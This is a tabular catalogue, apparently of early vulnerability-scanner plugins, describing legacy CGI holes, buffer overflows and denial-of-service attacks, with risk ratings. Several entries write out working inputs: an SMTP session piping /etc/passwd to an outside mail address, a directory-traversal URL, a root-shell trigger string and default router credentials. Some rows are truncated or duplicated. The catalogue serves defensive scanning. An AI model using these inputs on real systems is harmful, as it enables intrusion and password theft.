| Category | Name | Summary | Description | Copyright |
| Denial of Service | Microsoft Personnal Web Server | performs a denial of service against MSPersonal Web Server | It is possible to crash Microsoft Personnal Web Server by sending it a too long string. The MacOS 8.5.1 web sharing is affected too. Risk factor : medium/high | discovered by Gurney Halleck |
| Attack | phf | determines the presence of the 'phf' cgi | The 'phf' cgi allow a remote user to execute any command on the target system with the same privileges as the web server Risk factor : High | no copyright |
| Information gathering | Sendmail EXPN | sendmail EXPN and VRFY exploit | Sendmail should not allow a remote user to perform EXPN or VRFY commands, since it can give away some interesting informations. This plugin determines if the remote sendmail allow those commands Risk factor : low | no copyright |
| Attack | campas | determines the presence of the 'campas' cgi | The 'campas' cgi allows a remote user to view any file on the local system, with the privileges of the http daemon (root or nobody). This plugin determines if this cgi is installed on the remote host and tries to read a file (specified in the daemon preferences) on the remote server Risk factor : medium/high | no copyright |
| Information gathering | finger features | determines if fingerd sends the list of the unused accounts of the remote system | This plugin determines whether there's a hole in the fingerd daemon of a remote host, allowing a remote user to gain the list of the users\ who have never logged in the remote system -- this is of some interest to a darkside hacker who may know which accounts are never used and try to force them, since they are not monitored Risk factor : medium/high | no copyright |
| Attack | glimpse | determines the presence of the 'glimpse' cgi | This plugin determines whether the 'glimpse' cgi is installed This cgi allows a remote user execute any commands on the server Risk factor : high | no copyright |
| Attack | handler | determines the presence of the bug of the 'handler' cgi | This plugin determines whether a bug of the 'handler' cgi is present on a remote host. This bug allows a remote user to execute any command on the server Risk factor : high | no copyright |
| Attack | htmlscript | determines the presence of the 'htmlscript' cgi | This plugin determines whether the 'htmlscript' cgi in installed This cgi allows a remote user to view any file on a given host Risk factor : medium/high | no copyright |
| Information gathering | icat | determines the presence of the 'icat' cgi | This plugin determines the presence of the 'icat' cgi Some versions of this cgi allows a remote user to view any file on a WindowsNT system Risk factor : medium/high | no copyright |
| Information gathering | imap buffer overflow | imap buffer overflow | There's a bug on some versions of Imap which allow a remote user to become root using a buffer overflow This plugin determines if the remote imap is subject to this attack Risk factor : high | no copyright |
| Attack | in.fingerd '|command@@host' bug | determines if in.fingerd is exploitable | Some versions of in.fingerd allow a remote user to execute arbitrary commands on a remote host. This plugin tries to execute '/bin/id' Risk factor : high | no copyright |
| Information gathering | inn buffer overflow | determines if inn is vulnerable | This plugin determines whether inn is vulnerable Some old version on inn may be exploited using a remote buffer overflow Risk factor : high | no copyright |
| Information gathering | Sendmail standard vulnerabilities tester | gets infos about sendmail | A lot of security holes have been found in sendmail | no copyright |
| Attack | php | determines the presence of the 'php' cgi | The 'php' cgi allow a remote user to read any file on the target system with the same privileges as the web server. Risk factor : High | no copyright |
| Attack | remwatch | remwatch exploit (hpux) | Some versions of the 'remwatch' daemon allow may spawn a shell with the root priviledges if the string '11T ;/bin/ksh' is entered Risk factor : High | no copyright |
| Denial of Service | land | denial of service using the 'land' attack | Some implementations of TCP/IP are vulnerable to packets that are crafted in a particular way (a SYN packet in which the source address and port are the same as the destination--i.e., spoofed). This plugin tries to crash a remote host using this attack Risk factor : high | M3lt, FLC |
| Attack | ftp writeable root | attempts to write on the root of a remote ftp server | It is sometime possible to write on the root dir of a remote ftp server, which is a real problem since any hacker can upload a '.forward' or '.rhosts' file and then get a shell easily Risk factor : high | no copyright |
| Attack | webdist | determines the presence of the 'webdist' cgi | Determination of the presence of the 'webdist' cgi | no copyright |
| Attack | webgais | determines the presence of the 'webgais' cgi | Determination of the presence of the 'webgais' cgi | no copyright |
| Attack | websendmail | determines the presence of the 'websendmail' cgi | Determination of the presence of the 'websendmail' cgi | no copyright |
| Denial of Service | Livingston PortMaster crash | crashes a Livingston PortMaster | It is possible to crash a remote Livingston PortMaster by overflowing its buffers. Risk factor : high | no copyright |
| Attack | pfdispaly | determines the presence of the 'pfdispaly' cgi | The 'pfdispaly' cgi allow a remote user to read any file on the remote workstation Risk factor : high | no copyright |
| Information gathering | Standard System holes | underlines little holes of a newly installed system | Underlines little holes of a newly installed system Most newly installed system have some 'standard' ports opens, that are no use to anyone except the intruders | no copyright |
| Denial of Service | NT RAS PPTP | WindowNT DoS | Kevin Wormington | |
| Denial of Service | mdaemon | buffer overflow for MDaemon SMTP server | It is possible to crash a remote MDaemon SMTP server by sending it a string which is too long. Once it's crashed, MDaemon must be restarted by hands, and the workstation can't receive mails Risk factor : medium/high | no copyright |
| Denial of Service | pnserver DoS | attempts to crash PN Real Video Server | It's possible to crash some versions of the Progressive Networks Real Video Server by sending it some garbage. Risk Factor : Medium | no copyright |
| Attack | EWS (Excite for Web Servers) CGI hole | determines the presence of the 'phf' cgi | An EWS cgi allows a remote user to execute any command on the target system with the same privileges as the web server Risk factor : High | found by Marc Merlin |
| Attack | BIND buffer overrun | determines if BIND can be attacked by a buffer overflow | BIND 4.9 releases prior to BIND 4.9.7 and BIND 8 releases prior to 8.1.2 do not properly bounds check a memory copy when responding to an inverse query request. An improperly or maliciously formatted inverse query on a TCP stream can crash the server or allow an attacker to gain root privileges. This plugin determines if your BIND daemon can be affected by such an attack without actually gaining root access. Risk factor : high | Original code by Joshua J. Drake (jdrake@@pulsar.net) |
| Denial of Service | slmail | buffer overflow for the SLMail SMTP server | SLMail SMTP server for WindowsNT buffer overflow exploit | no copyright |
| Attack | php-cgi buffer overflow | overflows the buffer of the remote 'php' cgi | Some versions of the 'php' cgi can be overflowed thus allowing a remote user to execute arbitrary commands on the remote host. This plugin checks if the remote php is can be attacked this way Risk factor : High | no copyright |
| Information gathering | wingate | notifies the user whether wingate is running | This plugin notifies the user that wingate is installed on a remote machine | no copyright |
| Attack | info2www | determines the presence of the 'info2www' cgi | This plugin determines whether the 'info2www' cgi is installed on a remote computer. This cgi allows a remote user to execute any command on a given server Risk factor : high | no copyright |
| Information gathering | search.**@@host cfingerd feature | determines if cfingerd sends the list of users of the remote system | There is a bug in the cfingerd daemon which allow a remote user to get the list of all the users of the vulnerable system. This information may be of some help to a darkside hacker Risk factor : medium-high | no copyright |
| Information gathering | finger | determines the presence of the 'finger' cgi | This plugins determines whether the 'finger' cgi is installed This cgi may lead to a denial of service of a remote server and may give some interesting informations to an intruder Risk factor : medium/high | no copyright |
| Information gathering | test-cgi | determines the presence of the 'test-cgi' cgi | Determination of the presence of the 'test-cgi' cgi | no copyright |
| Denial of Service | recursive finger | denial of service using finger root@@@@@@@@(...)@@host | It is possible to lead to a denial of service using the recursive finger method, which consists in sending to the remote host a finger request containing a lot of '@@' Risk factor : Medium | no copyright |
| Denial of Service | ircd killer | attempts to crash ircd | This plugin tries to crash a remote ircd server by sending it a very long string Risk factor : medium | original code by fx of nnh (aaron@@ug.cs.dal.ca) |
| Attack | wu-ftpd 'site exec' bug | checks if the 'site exec' bug of wu-ftpd is present | Some wu-ftpd daemons are subject to the 'site exec' bug which allow a local user to gain root priviledges This plugin determines if the remote ftp server is subject to this bug Risk factor : medium (remotely) / high (locally) | no copyright |
| Information gathering | NULL Linux ftp backdoor | checks if the user NULL backdoor is present on the remote ftpd | There was a backdoor in the old ftp daemons of Linux, which allowed a remote user to log in with the username 'NULL', and then have the root privileges over FTP This plugin determines if it is present on the remote host Risk factor : high | no copyright |
| Information gathering | Windows NT ftp 'guest' account | checks if there's a 'guest' account on the remote WindowsNT ftp server | This plugin determines whether the 'guest' account of a remote WindowsNT box has been disabled | no copyright |
| Denial of Service | Serv-U 'CWD' denial of service | crashes a remote Serv-U FTP server | This plugin attempts to crash a remote Serv-U FTP server by issuing a CWD command with a long dir name Risk factor : High/Medium | no copyright |
| Information gathering | WFTP (Windows FTP server) login check | checks if WFTP accepts bogus logins | This plugin determines whether the remote ftp daemon accepts connections with any username/password, (ie : an old version of WFTP) | no copyright |
| Attack | ftp real path | attempts to get the real path to the remote ftp home | It is possible to get the real path to the ftp home by issuing the 'CWD' command This information may be of some interest to an intruder who know where to put a '.rhosts' file Risk factor : low | no copyright |
| Denial of Service | teardrop | fragments overlap denial of service | Some implementations of the TCP/IP IP fragmentation re-assembly code do not properly handle overlapping IP fragments. Teardrop is a widely available attack tool that exploits this vulnerability. Risk factor : high | Copyright (c) 1997 route|daemon9 |
| Denial of Service | sping | denial of service using the ping of death | Cert Advisory CA-96.26 : The TCP/IP specification (the basis for many protocols used on the Internet) allows for a maximum packet size of up to 65536 octets (1 octet = 8 bits of data), containing a minimum of 20 octets of IP header information and 0 or more octets of optional information, with the rest of the packet being data. It is known that some systems will react in an unpredictable fashion when receiving oversized IP packets. Reports indicate a range of reactions including crashing, freezing, and rebooting. In particular, the reports received by the CERT Coordination Center indicate that Internet Control Message Protocol (ICMP) packets issued via the "ping\subset of the TCP/IP suite of protocols that transmits error and control messages between systems. Two specific instances of the ICMP are the ICMP ECHO_REQUEST and ICMP ECHO_RESPONSE datagrams. These two instances can be used by a local host to determine whether a remote system is reachable via the network; this is commonly achieved using the "ping\Discussion in public forums has centered around the use of the "ping\command to construct oversized ICMP datagrams (which are encapsulated within an IP packet). Many ping implementations by default send ICMP datagrams consisting only of the 8 octets of ICMP header information but allow the user to specify a larger packet size if desired. You can read more information about this vulnerability on Mike Bremford's Web page. (Note that this is not a CERT/CC maintained page. We provide the URL here for your convenience.) http://www.sophist.demon.co.uk/ping/index.html | Jeff w.Roberson |
| Attack | nfs world export | check if a host exports a filesystem to anyone | Some servers exports any file to anybody, and it's usually not a good thing to do Risk factor : high | no copyright |
| Denial of Service | ascend kill | reboots an ascend router | It is possible to reboot an ascend router by sending it a specially constructed UDP packet on the discard port (9). Risk factor : high | rootshell |
| Denial of Service | winnuke | Windows denial of service using OOB msg on port 139 | This plugin sends a message out of band to the port 139 of a Windows95 machine, and attempts to crash it | no copyright |
| Information gathering | Count.cgi (wwwcount) | determines the presence of the 'Count.cgi' (wwwcount) | The 'count.cgi' cgi is subject to a bug which allow a remote user to execute arbitrary commands on the attacked host Risk factor : high | no copyright |
| Information gathering | X11-Checker | Determines if there is an X11-Server with disabled access control of the remote system | Checks, if there is an open X11-Server Risk factor : high | Sebastian Schreiber, GPL |
| Denial of Service | nestea | 'off by one IP header' bug | nestea is a variation of the teardrop attack which makes linux kernels die Risk factor : high | Copyright (c) 4/16/98 humble of rhino9 |
| Denial of Service | sunkill | performs a denial of service against a Solaris Workstation | This plugin performs a denial of service against a Solaris Workstation, by flooding it with ^D while negociating a telnet session | discovered by Jason Zapman II |
| Denial of Service | Oracle Webserver denial of service | overflows the buffer of the remote ows | Version 2.1 of Oracle Webserver can be lead to a denial of service if it is sent a too long string argument Risk factor : Medium | no copyright |
| Information gathering | nph-test-cgi | determines the presence of the 'nph-test-cgi' cgi | Determination of the presence of the 'nph-test-cgi' cgi | no copyright |
| Denial of Service | WINS udp flood | WINS denial of service | Some WINS server don't like to be flooded with UDP packets, thus giving up and stopping their service Risk factor : High | adapted from Holas, Ondxej |
| Information gathering | Sendmail : 'debug' vulnerability tester | sendmail 'debug' exploit | On very old implementations of sendmail, the 'debug' option allow a remote user to execute arbitrary commands as root Risk factor : High | no copyright |
| Information gathering | Sendmail 'decode' vulnerability tester | sendmail 'decode' exploit | If '/etc/aliases' contains "|/usr/bin/uudecode\decode, write to any file onwed by daemon, if they can connect to sendmail daemon, can write to any file owned by any user. Risk factor : High | no copyright |
| Information gathering | Sendmail overwrite feature | send a mail to a file | Some versions of sendmail allow a remote user to send a mail directly to a non-root owned file. This feature can be used to overwrite a '.rhost' file of a user or whatever... Risk factor : High | no copyright |
| Information gathering | Sendmail : mail from: <|program> | use a pipe to make sendmail execute a program | Some versions of sendmail allow a remote user to use pipes in usernames, thus allowing him to execute remote commands as root. This exploit is very popular... A typical attack to get the password file is: % telnet target.com 25 Trying 123.456.789.0... Connected to target.com Escape character is '^]'. 220 target.com Sendmail 5.55 ready at Mon, 12 Dec 93 23:51 mail from: "|/bin/mail me@@myhost.com < /etc/passwd\250 "|/bin/mail me@@myhost.com < /etc/passwd\rcpt to: mickeymouse 550 mickeymouse... User unknown data 354 Enter mail, end with ".\. 250 Mail accepted quit Connection closed by foreign host. Risk factor : High | no copyright |
| Information gathering | pop3 buffers overflows | pop3 buffers overflows | There's a bug on some versions of pop3d which allow a remote user to become root using a buffer overflow This plugin determines if the remote pop3d is subject to this attack Risk factor : high | no copyright |
| Denial of Service | IIS 'GET ../.. ' | performs a denial of service against IIS | It is possible to crash IIS by sending it the request 'GET ../..' Risk factor : medium/high | No copyright |
| Denial of Service | Bonk | another ip fragment denial of service | Variation of Teardrop which crashes some Windows boxes | bendi |
| Attack | Microsoft Frontpage exploits | plays with Microsoft Frontpage extensions | Some Microsoft Frontpage extensions allow remote users to view any file on the system and to overwrite those file If vulnerable, a site must quickly contact Microsoft for a patch Risk factor : High | Written after a paper from pedward@@WEBCOM.COM |
| Denial of Service | WindowsNT DNS QR denial | performs a denial of service against Windows NT DNS server | The WindowsNT DNS service terminates abnormally when it receives an answer to a DNS query that was never made So any remote user can ause a denial of service on the DNS server Risk factor : high | No copyright |
| Denial of Service | WindowsNT DNS flood denial | performs a denial of service against Windows NT DNS server | It is possile to crash some versions of WindowsNT DNS server by sending it a flood of characters The fix to this problem is in hotfixes-postSP3/dns-fix Risk factor : high | No copyright |
| Denial of Service | Chameleon SMTPd overflow | buffer overflow for the Chameleon SMTP server | Chameleon SMTPd does not properly checks bounds of some string, and a remote user may force it to crash. This plugin only tests the 'HELP longtopic' exploit, although there are several others problems | problems found by Anton Rager arager@@McGraw-Hill.com |
| Information gathering | in.ftpd PASS buffer overflow | attempts to overflow a remote ftp server | It is possible to overflow some in.ftpd deamons by sending a too long password. This may allow a remote intruder to execute arbitrary commands on the remote host. Risk factor : high | no copyright |
| Information gathering | in.ftpd USER buffer overflow | attempts to overflow a remote ftp server | It is possible to overflow some in.ftpd deamons by sending a too long username. This may allow a remote intruder to execute arbitrary commands on the remote host. Risk factor : high | no copyright |
| Information gathering | Motorola Cable router vulnerability | Checks for a vulnerability in Motorola Cable modems | It is sometimes possible to reconfigure a Motorola Cable router by connecting to it on port 1024 and using the good login/password (which is by default : 'cablecom/router') This plugin will attempt to connect to the remote host on port 1024 and will check if ever this vulnerability is present | discovered by January |
| Information gathering | qpopper buffer overflow | qpopper buffer overflow | There's a bug on some versions of qpopper which allow a remote user to become root using a buffer overflow This plugin determines if the remote qpopper is subject to this attack Risk factor : high | no copyright |
| Information gathering | lpd is active | notifies the user that lpd is available | Some badly configured line printer daemons (lpd) allow anyone to use the printer they are in charge of. This may allow an attacker to cause denials of service by filling the printer queue, or to waste paper and ink. Risk factor : medium | no copyright |
| Denial of Service | BNC overflow | overflows a buffer in a remote BNC server | Some older versions of BNC servers are vulnerable to a buffer overflow which may throw a shell account to an attacker running as the BNC uid The BNC server are usually used as iRC proxies This plugin attempts to connect on ports 9000 and 6666-6669 and sends a too long argument to the USER command. However, be warned that this plugin can be non-effective, since BNC can be run on any port. Risk factor : Medium/High | found by SDI http://www.sekure.org |
| Attack | MetaInfo servers | Read everything using '../../' in the URL | Several versions of MetaInfo servers allow remote users to read file they are not allowed to, by entering '../../' in the URL. Platform affected: WindowsNT Risk factor : High | discovered by Jeff Forristal |
| Information gathering | SSH Insertion attack | checks for the version SSH protocol used on a remote machine | Older versions of the SSH protocol are vulnerable to an 'insertion attack' This means that an attacker with access to the encrypted SSH stream may insert encrypted blocks in the stream that will decrypt to arbitrary commands to be executed on the SSH server. Risk factor: High | Discovered by CORE SDI S.A |
| Attack | ftp cwd ~root | attempts to log in as root | There is a bug in older versions of some FTP servers which would allow anonymous logins to be logged as root This plugin tries to see if this vulnerability is present on the remote ftp server Risk factor : high | no copyright |
| Attack | default system accounts | telnet to the remote host and guess login/passwords | Several operating systems come with default accounts that have no or simple passwords. This plugin will attempt to connect to the remote host on the telnet port and will attempt to find those weak accounts | no copyright |
| Attack | WebSite 1.0 buffer overflow | executes some code on a remote host running WebSite 1.0 | There is a buffer overflow in some WebSite 1.0 CGI scripts which allow a remote intruder to execute any command on the remote host Platform affected : WindowsNT Risk factor : High | no copyright |
| Information gathering | dumpenv | checks for the 'dumpenv' CGI | The dumpenv CGI is a cgi-script which is part of the Sambar server. It can give away several informations that don't need to be known to the public Risk factor : Low/Medium | no copyright |
| Attack | uploader.exe problem | uploads a file on the remote WebSite server | O'reilly's webserver 'website' contains a demopackage that contains the cgi-program uploader.exe. It's possible to use it to upload CGI-programs on the remote WebServer thus allowing an intruder to execute arbitrary commands remotely Platforms affected : WindowsNT, Windows95 Risk factor : High | found by Herman de Vette |
| Denial of Service | wingate DoS | performs a denial of service against a wingate server | Unsecured Wingates happily connect to themselves. When they run out of buffers, they prevent anyone from using them Platform affected : Windows Risk factor : Medium | found by Matt Carothers |
| Denial of Service | Annex | crashes an Annex terminal server | It is possible to crash an Annex terminal server by sending a too long argument to the 'ping' CGI. Risk factor : High | found by the Redes2 Security Team |
| Information gathering | wu_imapd buffer overflow | wu-imapd buffer overflow | CERT Advisory CA-98.09 - imapd : The CERT Coordination Center has received reports regarding a buffer overflow in some implementations of IMAP servers. The overflow is in library code from the University of Washington IMAP server that handles SASL server-level authentication. This vulnerability is different from the one discussed in CERT Advisory CA-97.09.imap_pop. Information about this vulnerability has been posted to various public mailing lists and newsgroups. All versions of the University of Washington IMAP server prior to the final (frozen, non-beta) version of imap-4.1 that support SASL server-level authentication are vulnerable. The vulnerability affects all University of Washington IMAP4rev1 servers prior to v10.234. Also, any v10.234 server that was distributed with Pine 4.0 or any imap-4.1.BETA is vulnerable. Additionally, the vulnerability is present in other IMAP servers that use library code from the University of Washington IMAP server to handle SASL server-level authentication. Risk factor : high | no copyright |
| Information gathering | wu_imapd buffer overflow | wu-imapd buffer overflow | CERT Advisory CA-98.09 - imapd : The CERT Coordination Center has received reports regarding a buffer overflow in some implementations of IMAP servers. The overflow is in library code from the University of Washington IMAP server that handles SASL server-level authentication. This vulnerability is different from the one discussed in CERT Advisory CA-97.09.imap_pop. Information about this vulnerability has been posted to various public mailing lists and newsgroups. All versions of the University of Washington IMAP server prior to the final (frozen, non-beta) version of imap-4.1 that support SASL server-level authentication are vulnerable. The vulnerability affects all University of Washington IMAP4rev1 servers prior to v10.234. Also, any v10.234 server that was distributed with Pine 4.0 or any imap-4.1.BETA is vulnerable. Additionally, the vulnerability is present in other IMAP servers that use library code from the University of Washington IMAP server to handle SASL server-level authentication. Risk factor : high | no copyright |
| Attack | faxsurvey | determines the presence of the 'faxsurvey' cgi | There exist a bug in the 'faxsurvey' CGI-Script, which allows an attacker to execute any command he wants with the permissions of the HTTP-Server. Risk factor : High | found by Tom |
| Attack | thttpd | determines if the remote thttpd allow anyone to read anything | Versions of the web server thttpd up to 2.03 (included) allow the remote intruders to read any files the thttpd server has the right to read, especially /etc/passwd Risk factor : High | hole found by Mark Slemko |
| Attack | iChat | determines if iChat is vulnerable to a stupid bug | iChat servers up to version 3.00 allow any remote user to view any file on the target system by doing the following request : http://chat.server.com:4080/../../../etc/passwd Risk factor : High | no copyright |
| Information gathering | guess operating system | guesses the remote OS | This plugin attempts to guess the type of the remote operating system by looking at the telnet and ftp banners | no copyright |
| Attack | ftp misc. overflows | attempts to find some buffer overflows on a remote ftp server | Some FTP server do not check the length of arguments of several commands and can thus exploit potential buffer overflows. This plugin attempts to find which commands are subject to possible buffer overflows Risk factor : high | no copyright |
| Attack | statd | attempts to send a buffer overflow to statd | There's a bug on some 'statd' that allows a remote user to become root. Also, it is possible to create and remote any file on the remote system using this service Risk factor : high | no copyright |
| Information gathering | Portmapper check | The portmapper is the central program for RPC programs. If an attacker can connect to it, he can find which RPC services are running and can make a more accurate attack. Risk factor : Medium | no copyright | |
| Information gathering | Sendmail HELO overflow | send anonymous mail | Some versions of sendmail have a bug that makes that mails sent by anybody who sent before a HELO string longer than about 1024 bytes wont have the additional info that sendmail stamps on the mail header such as the IP of the user who mailed it, the username of who did it and some more, because the long HELO name crops this info Risk factor : low | Javi Polo, GPL |
| Information gathering | firewall icmp check | licensed under the GPL | ||
| Attack | view_source | determines the presence of the 'view-source' cgi | The 'view_source' cgi, shipped with some httpd distributions allow a remote user to view any file the httpd daemon has the right to read Risk factor : High | no copyright |
| Scanner | Nmap tcp connect() scan | Taken from Fyodor's Nmap | ||
| Attack | ftp bounce | checks if the remote ftp server can be bounced | It is possible to force several FTP servers to connect to third parties hosts. This can be used by intruders to use your network resources to scan some other hosts, or it can be used to go through some firewalls Risk factor : high | no copyright |
| Information gathering | anonymous ftp enabled | checks if the remote ftp server accepts anonymous logins | The 'ftp' service may allow anonymous logins. If the server admin decides to let this service open to the whole world, he must configure it so that anyone can not read anything on its server It is usually not a good idea to let a anon ftp server opened with no real reason, since many FTP attacks require the intruder to log in... Risk factor : high if the anonymous FTP is badly setted up low if it is well configured | no copyright |
| Attack | cgi jj | determines the presence of the 'jj' cgi | The 'jj' cgi allow a remote user to execute any command on the target system with the same privileges as the web server Risk factor : High | no copyright |
| Attack | TFTP get file | Attempts to grab a via through tftp | The TFTP (Trivial File Transfer Protocol) allows remote user to read file withour having to log in. This may be a big security flaw, especially if tftpd (the TFTP server) is not well configured by the admin of the remote host Risk factor : high | no copyright |
| Attack | ftp PASV denial of service | attempts to do a PASV dos | Some FTP servers allow any user to make any number of PASV commands, thus blocking the free ports for legitimate services This plugin attempts to issue a given number of those commands Risk factor : medium | no copyright |
| Information gathering | icmp broadcast check | licensed under the GPL | ||
| Attack | ftp get /etc/passwd | this plugin is distributed under the GPL | ||
| Attack | ftp writeable directories | this plugin is distributed under the GPL | ||
| Attack | Tooltalk presence check | CERT Advisory CA-98.11 : An implementation fault in the ToolTalk object database server allows a remote attacker to run arbitrary code as the superuser on hosts supporting the ToolTalk service. The affected program runs on many popular UNIX operating systems supporting CDE and some Open Windows installs | no copyright | |
| Information gathering | r-commands check | checks the presence of the r-commands (rsh,rlogin...) | Some people install a proxy which is supposed to act as a firewall, and feel safe, even though they have not disabled the r-commands (rlogin, rsh...) This plugin checks that the rservices of a firewall protected computer are unavailable Risk factor : high | Licensed under the GPL |
| Attack | perl interpreter can be launched as a CGI | determines if the perl interpreter can be launched as a cgi | Some badly configured web servers allow the users to execute the perl interpreter, which is not a good thing, since it is like giving a shell access to anyone. Removing the perl executable from the 'cgi-bin' directory solves this problem Risk factor : high | no copyright |
| Information gathering | Sendmail supports EHLO | determines if the remote server supports EHLO greeting | The EHLO greeting indicates to sendmail to use ESMTP (Extended Simple Mail Transfer Protocol), which has additional vulnerabilities. Supporting it, and showing that sendmail supports it, may help an intruder to focus its efforts on a special weakness Risk factor : medium | distributed under the GPL |
| Denial of Service | + + + ATH0 modem hangup | makes a modem hangup | Most modems today follow the Hayes Command set (ATZ, ATDT, ATH0..) Unfortunately the way that these modems handle certain strings leaves them susceptible to a specific type of DoS attack. By forcing the victim to respond with the string "+ + +ATH0\modems will interpret the + + +ATH0 as the user manually attempting to enter command mode and execute a command. Because of this, when the victim attempts to respond with the + + +ATH0 the modem sees it within the IP datagram and hangs up the modem. It is also possible to make a remote modem hangup and then dial another number, forcing its owner to loose money Risk factor : medium | made after the bugtraq article of Max Schau (Noc-Wage) |
| Information gathering | auth enabled | checks if auth is enabled | The auth service provides sensitives informations to the intruders : it can be used to find out which accounts are running which servers. This may help attackers to focus on services that are worth hacking (those owned by root) If you do not use this service, disable it in /etc/inetd.conf. Risk factor: medium | distrubuted under the GPL |
| Attack | NIS server | determines if the remote host is a NIS server | The NIS service is mainly used to share password files among the hosts of a given network. These files must not be intercepted by the intruders. The first step of their attack is to find out whether the host they are attacking is a NIS server. This plugin will attempt to see if the remote host is a NIS server. Risk factor : medium | distributed under the GPL |
| Attack | mountd overflow | determines if the remote mountd may be overflowed | Some versions of mountd can be overflowed remotely, giving root access to anyone. This plugin will not determine if the remote host is vulnerable, but just warns the user if the remote mountd accepts a too long argument Warning: this plugin may crash your mount daemon Risk factor: high | based on LucySoft [ luci@@transart.ro ] exploit |
| Denial of Service | Wingate POP3 USER overflow | crash Wingate | Wingate can crash if a user telnet to port 110 (POP3) on a machine running Wingate and try to login as "USER x#9999[a lot of 9's]\Risk factor : high | Paco Brufal, GPL |
| Attack | Proxy CONNECT check | checks for badly configured proxies | Some misconfigured proxy accepts the CONNECT requests of their clients, which is a very bad thing since it can allow anyone to bypass a firewall and to use the proxy as a launch pad for attacking another site Risk factor : very high | Renaud Deraison |
| Information gathering | daytime check | determines if daytime is activated | This plugin determines if the daytime service is running. Sometimes, the date format issued by this service can help an intruder to guess the operating system of the remote host. This service is potentially vulnerable to spoofing attacks which can link the daytime port to the echo port consuming network bandwidth. You should disable this service if you do not use it Risk factor : low | no copyright |
| Attack | Netscape Server ?PageServices bug | make a request like http://foo.bar.edu/?PageServices | Requesting an URL with '?PageServices' at its end makes some Netscape servers dump the listing of the page directory, thus showing potentially sensitive files Risk factor : Medium/High | no copyright |
| Attack | Remote gopher server can be used as a proxy | checks for a bad gopherd | Most gopher servers accepts to act as a FTP proxy. Thus, sending a request like : ftp:any.ftp.site.com@@/ to the remote gopher server will make it act as a proxy. This vulnerability can be used by attackers to bypass your firewall (if the gopher server is trusted by the firewall). In addition to that, your host may server as a launch pad to attack some other sites via FTP You should also note that gopherd offers poor logging options Risk factor : very high | Renaud Deraison |
| Attack | Bootparamd presence check | When a diskless client needs to boot, it uses the bootparam protocol to get the necessary information needed from the server. If bootparamd is running one can guess at which is the client and server or use a program such as bootparam_prot.x to determine which is which. If an intruder uses BOOTPARAMPROC_WHOAMI and provides the address of the client, he will get it's NIS domain name back from bootparamd. If you know the NIS domain name, it may be possible to get a copy of the password file. One solution would be to filter incoming connections to port 111 (portmap) Risk factor : High | no copyright | |
| Attack | pcnfsd sends the users list | ga | ||
| Attack | NIS check domain | This plugin attempts to guess the remote NIS domain name. To do so, it retrieves the index of the remote NIS maps of the target. If it is successful, it means that you have incorrectly chosen your NIS domain name, and this is a problem since it allows remote attackers to get your NIS maps easily -- especially your passwd map. Risk factor : High | code from Dan Farmer (zen@@death.corp.sun.com) and Casper Dik (casper@@fwi.uva.nl). | |
| Attack | pcnfsd sends the printers list | ga | ||
| Attack | Proxy POST check | checks for badly configured proxies which accepts to redirect POST | Some misconfigured proxies accepts requests like POST http://somehost:25. This is a security flaw since it allows the anonymous redirection of connections. This plugin checks if the remote proxy accepts POST requests going anywhere Risk factor : very high | Renaud Deraison |
| Attack | Proxy GET check | checks for badly configured proxies | Some misconfigured proxies accept requests like asking some non-WWW ports (ie: 25). This is a security flaw since it allows the anonymous redirection of connections. This plugin checks if : a) The remote proxy accepts our requests (which may be a bad thing) b) The remote proxy accepts our requests on bogus ports If the remote proxy accepts requests on bogus ports, this may allow an attacker to bypass a firewall. Risk factor : very high | Renaud Deraison |
| Attack | pcnfsd warning | no copyright | ||
| Attack | Bootparamd gives NIS domain | When a diskless client needs to boot, it uses the bootparam protocol to get the necessary information needed from the server. If bootparamd is running one can guess at which is the client and server or use a program such as bootparam_prot.x to determine which is which. If an intruder uses BOOTPARAMPROC_WHOAMI and provides the address of the client, he will get it's NIS domain name back from bootparamd. If you know the NIS domain name, it may be possible to get a copy of the password file. One solution would be to filter incoming connections to port 111 (portmap) This plugin will attempt to retrieve the NIS domain name by giving to the remote bootparamd some computer names Risk factor : High | no copyright | |
| Attack | pfdispaly | determines the presence of the 'wrap' cgi | WWW HTTP/1.0 Server, as shipped with IRIX 6.2 (at least in low end machines) includes a perl script (wrap) which allows anyone on the net to get a listing for any directory with mode +755. Risk factor : medium/high | found by J.A. Gutierrez |
| Attack | llockmgr service | no copyright | ||
| Information gathering | rexecd check | checks for the precence of the rexec service | Because rexec uses unprivileged ports for the whole process, any user can send a request to a rexecd requesting connection of the stderr stream to an arbitrary port on the client machine. Since the client is unprivileged, there is no possibility for the legitimate stderr stream to be destined for a privileged port. In addition, spoofing techniques could allow the client to direct the stderr stream towards an arbitrary host as well as an arbitrary port, possibly exploiting a given trust model. Since rexecd terminates if the stderr port can't be connected to, and the port can be specified, rexecd can be used to easily scan the client host from the server host. Risk factor : medium | Licensed under the GPL |
| Attack | 3270 mapper service | no copyright | ||
| Attack | Etherstatd service | no copyright | ||
| Attack | nsed service | no copyright | ||
| Attack | nsemntd service | no copyright | ||
| Attack | ypupdated service | found by Avalon Security Research | ||
| Attack | database service | no copyright | ||
| Attack | alis service | no copyright | ||
| Attack | keyserv service | no copyright | ||
| Attack | nlockmgr service | no copyright | ||
| Attack | statmon service | no copyright | ||
| Attack | rexd service | no copyright | ||
| Attack | rje_mapper service | no copyright | ||
| Attack | rquotad service | no copyright | ||
| Attack | rstatd service | no copyright | ||
| Attack | rusersd service | no copyright | ||
| Attack | sched service | no copyright | ||
| Attack | selection service | no copyright | ||
| Attack | sprayd service | no copyright | ||
| Attack | showfhd service | no copyright | ||
| Attack | Sunlink mapper service | no copyright | ||
| Attack | tfsd service | no copyright | ||
| Attack | walld service | no copyright | ||
| Attack | ypxfrd service | no copyright | ||
| Attack | yppasswdd service | no copyright | ||
| Attack | ypbind service | no copyright | ||
| Attack | X25 service | no copyright | ||
| Attack | SNMP service | no copyright | ||
| Information gathering | icmp timestamp request | licensed under the GPL | ||
| Information gathering | icmp netmask request | licensed under the GPL | ||
| Denial of Service | iParty | shuts down a remote iParty server | iParty is an audio/text chat program for Windows. The iParty server listens on a specified port (6004 is default) for client requests. If someone connects to the chat server and sends a large amount of ASCII 255 chars, the server will simply close itself and disconnect all the current users. Risk factor : Low/Medium | found by HD Moore |
| Information gathering | HP Laserjet printer has no password | notifies the user that the remote printer has no password | This plugin attempts to see if the remote HP Laserjet printer has a password. A passwordless printer is a threat since it allows an attacker to change the printer's IP, thus resulting in creating network problems. | no copyright |
